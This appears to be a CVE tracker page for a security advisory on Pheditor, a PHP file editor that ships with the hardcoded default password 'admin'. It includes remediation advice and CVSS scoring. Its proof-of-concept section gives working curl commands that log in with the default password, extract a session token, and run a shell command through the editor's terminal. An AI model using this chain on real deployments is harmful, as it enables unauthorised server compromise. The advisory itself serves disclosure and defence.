Critical Alert 3 Active Exploits Detected Today

CVE-2026-58644 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability →
CVE-2026-25089 Fortinet FortiSandbox OS Command Injection Vulnerability →
CVE-2026-39808 Fortinet FortiSandbox OS Command Injection Vulnerability →
Powered by CVE Watchtower
×

CVE Watchtower


← Back to CVE List

CVE-2026-55579NVD

Vulnerability Summary

### Summary

Pheditor ships with a hardcoded default password `admin` (SHA-512 hash stored at `pheditor.php:11`). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.

### Details

Tested repository: https://github.com/pheditor/pheditor

Tested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)

Affected version: All versions of Pheditor

The password is hardcoded at `pheditor.php:11`:

```php
define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');
```

This is the SHA-512 hash of the string `admin`:
```bash
echo -n 'admin' | sha512sum
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec
```

The application displays a warning banner at `pheditor.php:1956-1958` when the default password is in use, but this is only visual — there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.

The password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.

**Combined impact:** With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.

### PoC

**Environment:** Any system running Pheditor with default configuration.

**Setup:**
```bash
git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &
```

**Positive trigger — authenticate with default password:**
```bash
curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
-d "pheditor_password=admin" -L -o /dev/null -w "%{http_code}"
```
Expected: `200` — successful authentication with the default password `admin`.

**Verify full access:**
```bash
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode 'command=echo `id`' \
--data-urlencode "dir="
```
Expected: `id` output showing web server user — proves full system access through default credentials combined with terminal RCE.

**Control (wrong password):**
```bash
curl -s -X POST http://localhost:8080/pheditor.php \
-d "pheditor_password=wrongpassword" | grep -o 'not correct'
```
Expected: `not correct` — authentication logic works but default password is trivially guessable.

**Cleanup:**
```bash
kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt
```

### Impact

Use of Hard-coded Credentials (CWE-798). The default password `admin` is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.

**Attacker privileges:** Unauthenticated remote attacker (PR:N).

**Security boundary crossed:** Unauthenticated → fully authenticated administrator.

**Confidentiality impact:** High — read all files within MAIN_DIR and beyond (via terminal).

**Integrity impact:** High — write/delete files, upload webshells, modify application code, execute arbitrary commands.

**Availability impact:** High — delete files and directories, disrupt services.

**Suggested remediation:**
1. Remove the default password — require user to set a password during installation.
2. Add a setup wizard that forces password creation on first access.
3. Add a forced password change on first login with default credentials.
4. Use `password_hash()` / `password_verify()` with `PASSWORD_BCRYPT` instead of raw SHA-512.

### Credits
- Thai Son Dinh from VinSOC Labs (R&D)
Severity Level
CRITICAL(9.8)
Published Date
Jul 16, 2026
Last Modified
Jul 16, 2026
Exploitation Status
No confirmed exploitation yet
EPSS Score (30-Day)
Data Pending
Root Weakness (CWE)
N/A
CVSS v3.1 Base Metrics
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
ConfidentialityHigh
IntegrityHigh
AvailabilityHigh

External References